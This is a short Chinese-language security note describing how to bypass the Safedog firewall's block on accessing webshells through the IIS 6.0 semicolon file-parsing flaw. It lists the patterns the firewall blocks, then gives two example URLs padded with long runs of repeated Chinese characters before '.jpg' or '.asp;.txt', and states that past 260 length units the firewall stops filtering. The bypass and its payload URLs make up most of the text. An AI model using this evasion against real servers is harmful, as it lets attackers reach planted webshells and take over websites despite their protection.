网站安全狗IIS6.0解析webshell访问限制bypass-利用中文超长字符串

2、访问a.asp;.jpg/;a.asp;a.jpg/a.asp;a.jpg等会被拦截。
3、上传.asp/.asa/.cer/.cdx等文件会被拦截。

中文文件名增加到一定长度试试:

  1. http://localhost/pic.asp;屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯.jpg

  1. http://127.0.0.1/躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺躺.asp;.txt

当长度超过260(中文算长度2)时,安全狗便失去了截断防御功能(中文放在前后都是可以的),中文长度当然不能无限大,因为IIS要求的URL长度是有限制的,超过便会报错。